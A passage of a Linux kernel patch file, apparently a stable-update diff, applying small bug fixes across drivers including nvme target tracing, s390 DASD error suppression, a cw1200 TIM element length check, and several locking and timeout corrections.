+ 		ieee80211_amsdu_to_8023s(skb, &list, priv->curr_addr,
+-					 priv->wdev.iftype, 0, NULL, NULL);
++					 priv->wdev.iftype, 0, NULL, NULL, false);
+ 
+ 		while (!skb_queue_empty(&list)) {
+ 			struct rx_packet_hdr *rx_hdr;
+diff --git a/drivers/net/wireless/st/cw1200/txrx.c b/drivers/net/wireless/st/cw1200/txrx.c
+index 6894b919ff94b..e16e9ae90d204 100644
+--- a/drivers/net/wireless/st/cw1200/txrx.c
++++ b/drivers/net/wireless/st/cw1200/txrx.c
+@@ -1166,7 +1166,7 @@ void cw1200_rx_cb(struct cw1200_common *priv,
+ 		size_t ies_len = skb->len - (ies - (u8 *)(skb->data));
+ 
+ 		tim_ie = cfg80211_find_ie(WLAN_EID_TIM, ies, ies_len);
+-		if (tim_ie) {
++		if (tim_ie && tim_ie[1] >= sizeof(struct ieee80211_tim_ie)) {
+ 			struct ieee80211_tim_ie *tim =
+ 				(struct ieee80211_tim_ie *)&tim_ie[2];
+ 
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 1aff793a1d77e..0729ab5430725 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1366,8 +1366,10 @@ static int nvme_identify_ctrl(struct nvme_ctrl *dev, struct nvme_id_ctrl **id)
+ 
+ 	error = nvme_submit_sync_cmd(dev->admin_q, &c, *id,
+ 			sizeof(struct nvme_id_ctrl));
+-	if (error)
++	if (error) {
+ 		kfree(*id);
++		*id = NULL;
++	}
+ 	return error;
+ }
+ 
+@@ -1496,6 +1498,7 @@ static int nvme_identify_ns(struct nvme_ctrl *ctrl, unsigned nsid,
+ 	if (error) {
+ 		dev_warn(ctrl->device, "Identify namespace failed (%d)\n", error);
+ 		kfree(*id);
++		*id = NULL;
+ 	}
+ 	return error;
+ }
+diff --git a/drivers/nvme/target/rdma.c b/drivers/nvme/target/rdma.c
+index 4597bca43a6d8..a6d55ebb82382 100644
+--- a/drivers/nvme/target/rdma.c
++++ b/drivers/nvme/target/rdma.c
+@@ -473,12 +473,8 @@ nvmet_rdma_alloc_rsps(struct nvmet_rdma_queue *queue)
+ 	return 0;
+ 
+ out_free:
+-	while (--i >= 0) {
+-		struct nvmet_rdma_rsp *rsp = &queue->rsps[i];
+-
+-		list_del(&rsp->free_list);
+-		nvmet_rdma_free_rsp(ndev, rsp);
+-	}
++	while (--i >= 0)
++		nvmet_rdma_free_rsp(ndev, &queue->rsps[i]);
+ 	kfree(queue->rsps);
+ out:
+ 	return ret;
+@@ -489,12 +485,8 @@ static void nvmet_rdma_free_rsps(struct nvmet_rdma_queue *queue)
+ 	struct nvmet_rdma_device *ndev = queue->dev;
+ 	int i, nr_rsps = queue->recv_queue_size * 2;
+ 
+-	for (i = 0; i < nr_rsps; i++) {
+-		struct nvmet_rdma_rsp *rsp = &queue->rsps[i];
+-
+-		list_del(&rsp->free_list);
+-		nvmet_rdma_free_rsp(ndev, rsp);
+-	}
++	for (i = 0; i < nr_rsps; i++)
++		nvmet_rdma_free_rsp(ndev, &queue->rsps[i]);
+ 	kfree(queue->rsps);
+ }
+ 
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index 5556f55880411..76b9eb438268f 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -836,6 +836,7 @@ static int nvmet_tcp_handle_icreq(struct nvmet_tcp_queue *queue)
+ 		pr_err("bad nvme-tcp pdu length (%d)\n",
+ 			le32_to_cpu(icreq->hdr.plen));
+ 		nvmet_tcp_fatal_error(queue);
++		return -EPROTO;
+ 	}
+ 
+ 	if (icreq->pfv != NVME_TCP_PFV_1_0) {
+diff --git a/drivers/nvme/target/trace.c b/drivers/nvme/target/trace.c
+index bff454d46255b..6ee1f3db81d04 100644
+--- a/drivers/nvme/target/trace.c
++++ b/drivers/nvme/target/trace.c
+@@ -211,7 +211,7 @@ const char *nvmet_trace_disk_name(struct trace_seq *p, char *name)
+ 	return ret;
+ }
+ 
+-const char *nvmet_trace_ctrl_name(struct trace_seq *p, struct nvmet_ctrl *ctrl)
++const char *nvmet_trace_ctrl_id(struct trace_seq *p, u16 ctrl_id)
+ {
+ 	const char *ret = trace_seq_buffer_ptr(p);
+ 
+@@ -224,8 +224,8 @@ const char *nvmet_trace_ctrl_name(struct trace_seq *p, struct nvmet_ctrl *ctrl)
+ 	 * If we can know the extra data of the connect command in this stage,
+ 	 * we can update this print statement later.
+ 	 */
+-	if (ctrl)
+-		trace_seq_printf(p, "%d", ctrl->cntlid);
++	if (ctrl_id)
++		trace_seq_printf(p, "%d", ctrl_id);
+ 	else
+ 		trace_seq_printf(p, "_");
+ 	trace_seq_putc(p, 0);
+diff --git a/drivers/nvme/target/trace.h b/drivers/nvme/target/trace.h
+index 974d99d47f514..7f7ebf9558e50 100644
+--- a/drivers/nvme/target/trace.h
++++ b/drivers/nvme/target/trace.h
+@@ -32,18 +32,24 @@ const char *nvmet_trace_parse_fabrics_cmd(struct trace_seq *p, u8 fctype,
+ 	 nvmet_trace_parse_nvm_cmd(p, opcode, cdw10) :			\
+ 	 nvmet_trace_parse_admin_cmd(p, opcode, cdw10)))
+ 
+-const char *nvmet_trace_ctrl_name(struct trace_seq *p, struct nvmet_ctrl *ctrl);
+-#define __print_ctrl_name(ctrl)				\
+-	nvmet_trace_ctrl_name(p, ctrl)
++const char *nvmet_trace_ctrl_id(struct trace_seq *p, u16 ctrl_id);
++#define __print_ctrl_id(ctrl_id)			\
++	nvmet_trace_ctrl_id(p, ctrl_id)
+ 
+ const char *nvmet_trace_disk_name(struct trace_seq *p, char *name);
+ #define __print_disk_name(name)				\
+ 	nvmet_trace_disk_name(p, name)
+ 
+ #ifndef TRACE_HEADER_MULTI_READ
+-static inline struct nvmet_ctrl *nvmet_req_to_ctrl(struct nvmet_req *req)
++static inline u16 nvmet_req_to_ctrl_id(struct nvmet_req *req)
+ {
+-	return req->sq->ctrl;
++	/*
++	 * The queue and controller pointers are not valid until an association
++	 * has been established.
++	 */
++	if (!req->sq || !req->sq->ctrl)
++		return 0;
++	return req->sq->ctrl->cntlid;
+ }
+ 
+ static inline void __assign_req_name(char *name, struct nvmet_req *req)
+@@ -62,7 +68,7 @@ TRACE_EVENT(nvmet_req_init,
+ 	TP_ARGS(req, cmd),
+ 	TP_STRUCT__entry(
+ 		__field(struct nvme_command *, cmd)
+-		__field(struct nvmet_ctrl *, ctrl)
++		__field(u16, ctrl_id)
+ 		__array(char, disk, DISK_NAME_LEN)
+ 		__field(int, qid)
+ 		__field(u16, cid)
+@@ -75,7 +81,7 @@ TRACE_EVENT(nvmet_req_init,
+ 	),
+ 	TP_fast_assign(
+ 		__entry->cmd = cmd;
+-		__entry->ctrl = nvmet_req_to_ctrl(req);
++		__entry->ctrl_id = nvmet_req_to_ctrl_id(req);
+ 		__assign_req_name(__entry->disk, req);
+ 		__entry->qid = req->sq->qid;
+ 		__entry->cid = cmd->common.command_id;
+@@ -89,7 +95,7 @@ TRACE_EVENT(nvmet_req_init,
+ 	),
+ 	TP_printk("nvmet%s: %sqid=%d, cmdid=%u, nsid=%u, flags=%#x, "
+ 		  "meta=%#llx, cmd=(%s, %s)",
+-		__print_ctrl_name(__entry->ctrl),
++		__print_ctrl_id(__entry->ctrl_id),
+ 		__print_disk_name(__entry->disk),
+ 		__entry->qid, __entry->cid, __entry->nsid,
+ 		__entry->flags, __entry->metadata,
+@@ -103,7 +109,7 @@ TRACE_EVENT(nvmet_req_complete,
+ 	TP_PROTO(struct nvmet_req *req),
+ 	TP_ARGS(req),
+ 	TP_STRUCT__entry(
+-		__field(struct nvmet_ctrl *, ctrl)
++		__field(u16, ctrl_id)
+ 		__array(char, disk, DISK_NAME_LEN)
+ 		__field(int, qid)
+ 		__field(int, cid)
+@@ -111,7 +117,7 @@ TRACE_EVENT(nvmet_req_complete,
+ 		__field(u16, status)
+ 	),
+ 	TP_fast_assign(
+-		__entry->ctrl = nvmet_req_to_ctrl(req);
++		__entry->ctrl_id = nvmet_req_to_ctrl_id(req);
+ 		__entry->qid = req->cq->qid;
+ 		__entry->cid = req->cqe->command_id;
+ 		__entry->result = le64_to_cpu(req->cqe->result.u64);
+@@ -119,7 +125,7 @@ TRACE_EVENT(nvmet_req_complete,
+ 		__assign_req_name(__entry->disk, req);
+ 	),
+ 	TP_printk("nvmet%s: %sqid=%d, cmdid=%u, res=%#llx, status=%#x",
+-		__print_ctrl_name(__entry->ctrl),
++		__print_ctrl_id(__entry->ctrl_id),
+ 		__print_disk_name(__entry->disk),
+ 		__entry->qid, __entry->cid, __entry->result, __entry->status)
+ 
+diff --git a/drivers/platform/surface/aggregator/controller.c b/drivers/platform/surface/aggregator/controller.c
+index 30cea324ff95f..a6a8f4b1836a6 100644
+--- a/drivers/platform/surface/aggregator/controller.c
++++ b/drivers/platform/surface/aggregator/controller.c
+@@ -1354,7 +1354,8 @@ void ssam_controller_destroy(struct ssam_controller *ctrl)
+ 	if (ctrl->state == SSAM_CONTROLLER_UNINITIALIZED)
+ 		return;
+ 
+-	WARN_ON(ctrl->state != SSAM_CONTROLLER_STOPPED);
++	WARN_ON(ctrl->state != SSAM_CONTROLLER_STOPPED &&
++		ctrl->state != SSAM_CONTROLLER_INITIALIZED);
+ 
+ 	/*
+ 	 * Note: New events could still have been received after the previous
+diff --git a/drivers/platform/x86/lg-laptop.c b/drivers/platform/x86/lg-laptop.c
+index 2e1dc91bfc764..5704981d18487 100644
+--- a/drivers/platform/x86/lg-laptop.c
++++ b/drivers/platform/x86/lg-laptop.c
+@@ -715,7 +715,7 @@ static int acpi_add(struct acpi_device *device)
+ 		default:
+ 			year = 2019;
+ 		}
+-	pr_info("product: %s  year: %d\n", product, year);
++	pr_info("product: %s  year: %d\n", product ?: "unknown", year);
+ 
+ 	if (year >= 2019)
+ 		battery_limit_use_wmbb = 1;
+diff --git a/drivers/rtc/rtc-nct3018y.c b/drivers/rtc/rtc-nct3018y.c
+index d43acd3920ed3..108eced8f0030 100644
+--- a/drivers/rtc/rtc-nct3018y.c
++++ b/drivers/rtc/rtc-nct3018y.c
+@@ -99,6 +99,8 @@ static int nct3018y_get_alarm_mode(struct i2c_client *client, unsigned char *ala
+ 		if (flags < 0)
+ 			return flags;
+ 		*alarm_enable = flags & NCT3018Y_BIT_AIE;
++		dev_dbg(&client->dev, "%s:alarm_enable:%x\n", __func__, *alarm_enable);
++
+ 	}
+ 
+ 	if (alarm_flag) {
+@@ -107,11 +109,9 @@ static int nct3018y_get_alarm_mode(struct i2c_client *client, unsigned char *ala
+ 		if (flags < 0)
+ 			return flags;
+ 		*alarm_flag = flags & NCT3018Y_BIT_AF;
++		dev_dbg(&client->dev, "%s:alarm_flag:%x\n", __func__, *alarm_flag);
+ 	}
+ 
+-	dev_dbg(&client->dev, "%s:alarm_enable:%x alarm_flag:%x\n",
+-		__func__, *alarm_enable, *alarm_flag);
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/s390/block/dasd.c b/drivers/s390/block/dasd.c
+index 341d65acd715d..4250671e4400d 100644
+--- a/drivers/s390/block/dasd.c
++++ b/drivers/s390/block/dasd.c
+@@ -1597,9 +1597,15 @@ static int dasd_ese_needs_format(struct dasd_block *block, struct irb *irb)
+ 	if (!sense)
+ 		return 0;
+ 
+-	return !!(sense[1] & SNS1_NO_REC_FOUND) ||
+-		!!(sense[1] & SNS1_FILE_PROTECTED) ||
+-		scsw_cstat(&irb->scsw) == SCHN_STAT_INCORR_LEN;
++	if (sense[1] & SNS1_NO_REC_FOUND)
++		return 1;
++
++	if ((sense[1] & SNS1_INV_TRACK_FORMAT) &&
++	    scsw_is_tm(&irb->scsw) &&
++	    !(sense[2] & SNS2_ENV_DATA_PRESENT))
++		return 1;
++
++	return 0;
+ }
+ 
+ static int dasd_ese_oos_cond(u8 *sense)
+@@ -1620,7 +1626,7 @@ void dasd_int_handler(struct ccw_device *cdev, unsigned long intparm,
+ 	struct dasd_device *device;
+ 	unsigned long now;
+ 	int nrf_suppressed = 0;
+-	int fp_suppressed = 0;
++	int it_suppressed = 0;
+ 	struct request *req;
+ 	u8 *sense = NULL;
+ 	int expires;
+@@ -1675,8 +1681,9 @@ void dasd_int_handler(struct ccw_device *cdev, unsigned long intparm,
+ 		 */
+ 		sense = dasd_get_sense(irb);
+ 		if (sense) {
+-			fp_suppressed = (sense[1] & SNS1_FILE_PROTECTED) &&
+-				test_bit(DASD_CQR_SUPPRESS_FP, &cqr->flags);
++			it_suppressed =	(sense[1] & SNS1_INV_TRACK_FORMAT) &&
++				!(sense[2] & SNS2_ENV_DATA_PRESENT) &&
++				test_bit(DASD_CQR_SUPPRESS_IT, &cqr->flags);
+ 			nrf_suppressed = (sense[1] & SNS1_NO_REC_FOUND) &&
+ 				test_bit(DASD_CQR_SUPPRESS_NRF, &cqr->flags);
+ 
+@@ -1691,7 +1698,7 @@ void dasd_int_handler(struct ccw_device *cdev, unsigned long intparm,
+ 				return;
+ 			}
+ 		}
+-		if (!(fp_suppressed || nrf_suppressed))
++		if (!(it_suppressed || nrf_suppressed))
+ 			device->discipline->dump_sense_dbf(device, irb, "int");
+ 
+ 		if (device->features & DASD_FEATURE_ERPLOG)
+@@ -2452,14 +2459,17 @@ static int _dasd_sleep_on_queue(struct list_head *ccw_queue, int interruptible)
+ 	rc = 0;
+ 	list_for_each_entry_safe(cqr, n, ccw_queue, blocklist) {
+ 		/*
+-		 * In some cases the 'File Protected' or 'Incorrect Length'
+-		 * error might be expected and error recovery would be
+-		 * unnecessary in these cases.	Check if the according suppress
+-		 * bit is set.
++		 * In some cases certain errors might be expected and
++		 * error recovery would be unnecessary in these cases.
++		 * Check if the according suppress bit is set.
+ 		 */
+ 		sense = dasd_get_sense(&cqr->irb);
+-		if (sense && sense[1] & SNS1_FILE_PROTECTED &&
+-		    test_bit(DASD_CQR_SUPPRESS_FP, &cqr->flags))
++		if (sense && (sense[1] & SNS1_INV_TRACK_FORMAT) &&
++		    !(sense[2] & SNS2_ENV_DATA_PRESENT) &&
++		    test_bit(DASD_CQR_SUPPRESS_IT, &cqr->flags))
++			continue;
++		if (sense && (sense[1] & SNS1_NO_REC_FOUND) &&
++		    test_bit(DASD_CQR_SUPPRESS_NRF, &cqr->flags))
+ 			continue;
+ 		if (scsw_cstat(&cqr->irb.scsw) == 0x40 &&
+ 		    test_bit(DASD_CQR_SUPPRESS_IL, &cqr->flags))
+diff --git a/drivers/s390/block/dasd_3990_erp.c b/drivers/s390/block/dasd_3990_erp.c
+index 91cb9d52a4250..b96044fb1a3af 100644
+--- a/drivers/s390/block/dasd_3990_erp.c
++++ b/drivers/s390/block/dasd_3990_erp.c
+@@ -1406,14 +1406,8 @@ dasd_3990_erp_file_prot(struct dasd_ccw_req * erp)
+ 
+ 	struct dasd_device *device = erp->startdev;
+ 
+-	/*
+-	 * In some cases the 'File Protected' error might be expected and
+-	 * log messages shouldn't be written then.
+-	 * Check if the according suppress bit is set.
+-	 */
+-	if (!test_bit(DASD_CQR_SUPPRESS_FP, &erp->flags))
+-		dev_err(&device->cdev->dev,
+-			"Accessing the DASD failed because of a hardware error\n");
++	dev_err(&device->cdev->dev,
++		"Accessing the DASD failed because of a hardware error\n");
+ 
+ 	return dasd_3990_erp_cleanup(erp, DASD_CQR_FAILED);
+ 
+diff --git a/drivers/s390/block/dasd_diag.c b/drivers/s390/block/dasd_diag.c
+index f956a4ac9881a..5802aead09f36 100644
+--- a/drivers/s390/block/dasd_diag.c
++++ b/drivers/s390/block/dasd_diag.c
+@@ -639,7 +639,6 @@ static void dasd_diag_setup_blk_queue(struct dasd_block *block)
+ 	/* With page sized segments each segment can be translated into one idaw/tidaw */
+ 	blk_queue_max_segment_size(q, PAGE_SIZE);
+ 	blk_queue_segment_boundary(q, PAGE_SIZE - 1);
+-	blk_queue_dma_alignment(q, PAGE_SIZE - 1);
+ }
+ 
+ static int dasd_diag_pe_handler(struct dasd_device *device,
+diff --git a/drivers/s390/block/dasd_eckd.c b/drivers/s390/block/dasd_eckd.c
+index c5619751a0658..67f04f0b38176 100644
+--- a/drivers/s390/block/dasd_eckd.c
++++ b/drivers/s390/block/dasd_eckd.c
+@@ -2288,6 +2288,7 @@ dasd_eckd_analysis_ccw(struct dasd_device *device)
+ 	cqr->status = DASD_CQR_FILLED;
+ 	/* Set flags to suppress output for expected errors */
+ 	set_bit(DASD_CQR_SUPPRESS_NRF, &cqr->flags);
++	set_bit(DASD_CQR_SUPPRESS_IT, &cqr->flags);
+ 
+ 	return cqr;
+ }
+@@ -2569,7 +2570,6 @@ dasd_eckd_build_check_tcw(struct dasd_device *base, struct format_data_t *fdata,
+ 	cqr->buildclk = get_tod_clock();
+ 	cqr->status = DASD_CQR_FILLED;
+ 	/* Set flags to suppress output for expected errors */
+-	set_bit(DASD_CQR_SUPPRESS_FP, &cqr->flags);
+ 	set_bit(DASD_CQR_SUPPRESS_IL, &cqr->flags);
+ 
+ 	return cqr;
+@@ -4145,8 +4145,6 @@ static struct dasd_ccw_req *dasd_eckd_build_cp_cmd_single(
+ 
+ 	/* Set flags to suppress output for expected errors */
+ 	if (dasd_eckd_is_ese(basedev)) {
+-		set_bit(DASD_CQR_SUPPRESS_FP, &cqr->flags);
+-		set_bit(DASD_CQR_SUPPRESS_IL, &cqr->flags);
+ 		set_bit(DASD_CQR_SUPPRESS_NRF, &cqr->flags);
+ 	}
+ 
+@@ -4648,9 +4646,8 @@ static struct dasd_ccw_req *dasd_eckd_build_cp_tpm_track(
+ 
+ 	/* Set flags to suppress output for expected errors */
+ 	if (dasd_eckd_is_ese(basedev)) {
+-		set_bit(DASD_CQR_SUPPRESS_FP, &cqr->flags);
+-		set_bit(DASD_CQR_SUPPRESS_IL, &cqr->flags);
+ 		set_bit(DASD_CQR_SUPPRESS_NRF, &cqr->flags);
++		set_bit(DASD_CQR_SUPPRESS_IT, &cqr->flags);
+ 	}
+ 
+ 	return cqr;
+@@ -5821,36 +5818,32 @@ static void dasd_eckd_dump_sense(struct dasd_device *device,
+ {
+ 	u8 *sense = dasd_get_sense(irb);
+ 
+-	if (scsw_is_tm(&irb->scsw)) {
+-		/*
+-		 * In some cases the 'File Protected' or 'Incorrect Length'
+-		 * error might be expected and log messages shouldn't be written
+-		 * then. Check if the according suppress bit is set.
+-		 */
+-		if (sense && (sense[1] & SNS1_FILE_PROTECTED) &&
+-		    test_bit(DASD_CQR_SUPPRESS_FP, &req->flags))
+-			return;
+-		if (scsw_cstat(&irb->scsw) == 0x40 &&
+-		    test_bit(DASD_CQR_SUPPRESS_IL, &req->flags))
+-			return;
++	/*
++	 * In some cases certain errors might be expected and
++	 * log messages shouldn't be written then.
++	 * Check if the according suppress bit is set.
++	 */
++	if (sense && (sense[1] & SNS1_INV_TRACK_FORMAT) &&
++	    !(sense[2] & SNS2_ENV_DATA_PRESENT) &&
++	    test_bit(DASD_CQR_SUPPRESS_IT, &req->flags))
++		return;
+ 
+-		dasd_eckd_dump_sense_tcw(device, req, irb);
+-	} else {
+-		/*
+-		 * In some cases the 'Command Reject' or 'No Record Found'
+-		 * error might be expected and log messages shouldn't be
+-		 * written then. Check if the according suppress bit is set.
+-		 */
+-		if (sense && sense[0] & SNS0_CMD_REJECT &&
+-		    test_bit(DASD_CQR_SUPPRESS_CR, &req->flags))
+-			return;
++	if (sense && sense[0] & SNS0_CMD_REJECT &&
++	    test_bit(DASD_CQR_SUPPRESS_CR, &req->flags))
++		return;
+ 
+-		if (sense && sense[1] & SNS1_NO_REC_FOUND &&
+-		    test_bit(DASD_CQR_SUPPRESS_NRF, &req->flags))
+-			return;
++	if (sense && sense[1] & SNS1_NO_REC_FOUND &&
++	    test_bit(DASD_CQR_SUPPRESS_NRF, &req->flags))
++		return;
+ 
++	if (scsw_cstat(&irb->scsw) == 0x40 &&
++	    test_bit(DASD_CQR_SUPPRESS_IL, &req->flags))
++		return;
++
++	if (scsw_is_tm(&irb->scsw))
++		dasd_eckd_dump_sense_tcw(device, req, irb);
++	else
+ 		dasd_eckd_dump_sense_ccw(device, req, irb);
+-	}
+ }
+ 
+ static int dasd_eckd_reload_device(struct dasd_device *device)
+@@ -6896,7 +6889,6 @@ static void dasd_eckd_setup_blk_queue(struct dasd_block *block)
+ 	/* With page sized segments each segment can be translated into one idaw/tidaw */
+ 	blk_queue_max_segment_size(q, PAGE_SIZE);
+ 	blk_queue_segment_boundary(q, PAGE_SIZE - 1);
+-	blk_queue_dma_alignment(q, PAGE_SIZE - 1);
+ }
+ 
+ static struct ccw_driver dasd_eckd_driver = {
+diff --git a/drivers/s390/block/dasd_int.h b/drivers/s390/block/dasd_int.h
+index 00bcd177264ac..7823e6c06e29c 100644
+--- a/drivers/s390/block/dasd_int.h
++++ b/drivers/s390/block/dasd_int.h
+@@ -225,7 +225,7 @@ struct dasd_ccw_req {
+  * The following flags are used to suppress output of certain errors.
+  */
+ #define DASD_CQR_SUPPRESS_NRF	4	/* Suppress 'No Record Found' error */
+-#define DASD_CQR_SUPPRESS_FP	5	/* Suppress 'File Protected' error*/
++#define DASD_CQR_SUPPRESS_IT	5	/* Suppress 'Invalid Track' error*/
+ #define DASD_CQR_SUPPRESS_IL	6	/* Suppress 'Incorrect Length' error */
+ #define DASD_CQR_SUPPRESS_CR	7	/* Suppress 'Command Reject' error */
+ 
+diff --git a/drivers/s390/cio/idset.c b/drivers/s390/cio/idset.c
+index 45f9c0736be4f..e5f28370a9039 100644
+--- a/drivers/s390/cio/idset.c
++++ b/drivers/s390/cio/idset.c
+@@ -16,20 +16,21 @@ struct idset {
+ 	unsigned long bitmap[];
+ };
+ 
+-static inline unsigned long bitmap_size(int num_ssid, int num_id)
++static inline unsigned long idset_bitmap_size(int num_ssid, int num_id)
+ {
+-	return BITS_TO_LONGS(num_ssid * num_id) * sizeof(unsigned long);
++	return bitmap_size(size_mul(num_ssid, num_id));
+ }
+ 
+ static struct idset *idset_new(int num_ssid, int num_id)
+ {
+ 	struct idset *set;
+ 
+-	set = vmalloc(sizeof(struct idset) + bitmap_size(num_ssid, num_id));
++	set = vmalloc(sizeof(struct idset) +
++		      idset_bitmap_size(num_ssid, num_id));
+ 	if (set) {
+ 		set->num_ssid = num_ssid;
+ 		set->num_id = num_id;
+-		memset(set->bitmap, 0, bitmap_size(num_ssid, num_id));
++		memset(set->bitmap, 0, idset_bitmap_size(num_ssid, num_id));
+ 	}
+ 	return set;
+ }
+@@ -41,7 +42,8 @@ void idset_free(struct idset *set)
+ 
+ void idset_fill(struct idset *set)
+ {
+-	memset(set->bitmap, 0xff, bitmap_size(set->num_ssid, set->num_id));
++	memset(set->bitmap, 0xff,
++	       idset_bitmap_size(set->num_ssid, set->num_id));
+ }
+ 
+ static inline void idset_add(struct idset *set, int ssid, int id)
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index 47b8102a7063a..587e3c2f7c48c 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -7596,7 +7596,7 @@ lpfc_sli4_repost_sgl_list(struct lpfc_hba *phba,
+ 	struct lpfc_sglq *sglq_entry = NULL;
+ 	struct lpfc_sglq *sglq_entry_next = NULL;
+ 	struct lpfc_sglq *sglq_entry_first = NULL;
+-	int status, total_cnt;
++	int status = 0, total_cnt;
+ 	int post_cnt = 0, num_posted = 0, block_cnt = 0;
+ 	int last_xritag = NO_XRI;
+ 	LIST_HEAD(prep_sgl_list);
+diff --git a/drivers/scsi/scsi_transport_spi.c b/drivers/scsi/scsi_transport_spi.c
+index f569cf0095c28..a95a35635c333 100644
+--- a/drivers/scsi/scsi_transport_spi.c
++++ b/drivers/scsi/scsi_transport_spi.c
+@@ -677,10 +677,10 @@ spi_dv_device_echo_buffer(struct scsi_device *sdev, u8 *buffer,
+ 	for (r = 0; r < retries; r++) {
+ 		result = spi_execute(sdev, spi_write_buffer, DMA_TO_DEVICE,
+ 				     buffer, len, &sshdr);
+-		if(result || !scsi_device_online(sdev)) {
++		if (result || !scsi_device_online(sdev)) {
+ 
+ 			scsi_device_set_state(sdev, SDEV_QUIESCE);
+-			if (scsi_sense_valid(&sshdr)
++			if (result > 0 && scsi_sense_valid(&sshdr)
+ 			    && sshdr.sense_key == ILLEGAL_REQUEST
+ 			    /* INVALID FIELD IN CDB */
+ 			    && sshdr.asc == 0x24 && sshdr.ascq == 0x00)
+diff --git a/drivers/soc/imx/imx93-pd.c b/drivers/soc/imx/imx93-pd.c
+index 4d235c8c4924d..46c47f645fafc 100644
+--- a/drivers/soc/imx/imx93-pd.c
++++ b/drivers/soc/imx/imx93-pd.c
+@@ -20,6 +20,7 @@
+ #define FUNC_STAT_PSW_STAT_MASK		BIT(0)
+ #define FUNC_STAT_RST_STAT_MASK		BIT(2)
+ #define FUNC_STAT_ISO_STAT_MASK		BIT(4)
++#define FUNC_STAT_SSAR_STAT_MASK	BIT(8)
+ 
+ struct imx93_power_domain {
+ 	struct generic_pm_domain genpd;
+@@ -50,7 +51,7 @@ static int imx93_pd_on(struct generic_pm_domain *genpd)
+ 	writel(val, addr + MIX_SLICE_SW_CTRL_OFF);
+ 
+ 	ret = readl_poll_timeout(addr + MIX_FUNC_STAT_OFF, val,
+-				 !(val & FUNC_STAT_ISO_STAT_MASK), 1, 10000);
++				 !(val & FUNC_STAT_SSAR_STAT_MASK), 1, 10000);
+ 	if (ret) {
+ 		dev_err(domain->dev, "pd_on timeout: name: %s, stat: %x\n", genpd->name, val);
+ 		return ret;
+@@ -72,7 +73,7 @@ static int imx93_pd_off(struct generic_pm_domain *genpd)
+ 	writel(val, addr + MIX_SLICE_SW_CTRL_OFF);
+ 
+ 	ret = readl_poll_timeout(addr + MIX_FUNC_STAT_OFF, val,
+-				 val & FUNC_STAT_PSW_STAT_MASK, 1, 1000);
++				 val & FUNC_STAT_PSW_STAT_MASK, 1, 10000);
+ 	if (ret) {
+ 		dev_err(domain->dev, "pd_off timeout: name: %s, stat: %x\n", genpd->name, val);
+ 		return ret;
+diff --git a/drivers/ssb/main.c b/drivers/ssb/main.c
+index 8a93c83cb6f80..d52e91258e989 100644
+--- a/drivers/ssb/main.c
++++ b/drivers/ssb/main.c
+@@ -837,7 +837,7 @@ static u32 clkfactor_f6_resolve(u32 v)
+ 	case SSB_CHIPCO_CLK_F6_7:
+ 		return 7;
+ 	}
+-	return 0;
++	return 1;
+ }
+ 
+ /* Calculate the speed the backplane would run at a given set of clockcontrol values */
+diff --git a/drivers/staging/iio/resolver/ad2s1210.c b/drivers/staging/iio/resolver/ad2s1210.c
+index 636c45b128438..afe89c91c89ea 100644
+--- a/drivers/staging/iio/resolver/ad2s1210.c
++++ b/drivers/staging/iio/resolver/ad2s1210.c
+@@ -657,9 +657,6 @@ static int ad2s1210_probe(struct spi_device *spi)
+ 	if (!indio_dev)
+ 		return -ENOMEM;
+ 	st = iio_priv(indio_dev);
+-	ret = ad2s1210_setup_gpios(st);
+-	if (ret < 0)
+-		return ret;
+ 
+ 	spi_set_drvdata(spi, indio_dev);
+ 
+@@ -670,6 +667,10 @@ static int ad2s1210_probe(struct spi_device *spi)
+ 	st->resolution = 12;
+ 	st->fexcit = AD2S1210_DEF_EXCIT;
+ 
++	ret = ad2s1210_setup_gpios(st);
++	if (ret < 0)
++		return ret;
++
+ 	indio_dev->info = &ad2s1210_info;
+ 	indio_dev->modes = INDIO_DIRECT_MODE;
+ 	indio_dev->channels = ad2s1210_channels;
+diff --git a/drivers/staging/ks7010/ks7010_sdio.c b/drivers/staging/ks7010/ks7010_sdio.c
+index 9fb118e77a1f0..f1d44e4955fc6 100644
+--- a/drivers/staging/ks7010/ks7010_sdio.c
++++ b/drivers/staging/ks7010/ks7010_sdio.c
+@@ -395,9 +395,9 @@ int ks_wlan_hw_tx(struct ks_wlan_private *priv, void *p, unsigned long size,
+ 	priv->hostt.buff[priv->hostt.qtail] = le16_to_cpu(hdr->event);
+ 	priv->hostt.qtail = (priv->hostt.qtail + 1) % SME_EVENT_BUFF_SIZE;
+ 
+-	spin_lock(&priv->tx_dev.tx_dev_lock);
++	spin_lock_bh(&priv->tx_dev.tx_dev_lock);
+ 	result = enqueue_txdev(priv, p, size, complete_handler, skb);
+-	spin_unlock(&priv->tx_dev.tx_dev_lock);
++	spin_unlock_bh(&priv->tx_dev.tx_dev_lock);
+ 
+ 	if (txq_has_space(priv))
+ 		queue_delayed_work(priv->wq, &priv->rw_dwork, 0);
+diff --git a/drivers/thunderbolt/switch.c b/drivers/thunderbolt/switch.c
+index d3058ede53064..3c2035fc9cee3 100644
+--- a/drivers/thunderbolt/switch.c
++++ b/drivers/thunderbolt/switch.c
+@@ -3086,6 +3086,7 @@ void tb_switch_remove(struct tb_switch *sw)
+ 			tb_switch_remove(port->remote->sw);
+ 			port->remote = NULL;
+ 		} else if (port->xdomain) {
++			port->xdomain->is_unplugged = true;
+ 			tb_xdomain_remove(port->xdomain);
+ 			port->xdomain = NULL;
+ 		}
+diff --git a/drivers/tty/serial/atmel_serial.c b/drivers/tty/serial/atmel_serial.c
+index fbce8ef205ce6..6a9310379dc2b 100644
+--- a/drivers/tty/serial/atmel_serial.c
++++ b/drivers/tty/serial/atmel_serial.c
+@@ -2539,7 +2539,7 @@ static const struct uart_ops atmel_pops = {
+ };
+ 
+ static const struct serial_rs485 atmel_rs485_supported = {
+-	.flags = SER_RS485_ENABLED | SER_RS485_RTS_AFTER_SEND | SER_RS485_RX_DURING_TX,
++	.flags = SER_RS485_ENABLED | SER_RS485_RTS_ON_SEND | SER_RS485_RX_DURING_TX,
+ 	.delay_rts_before_send = 1,
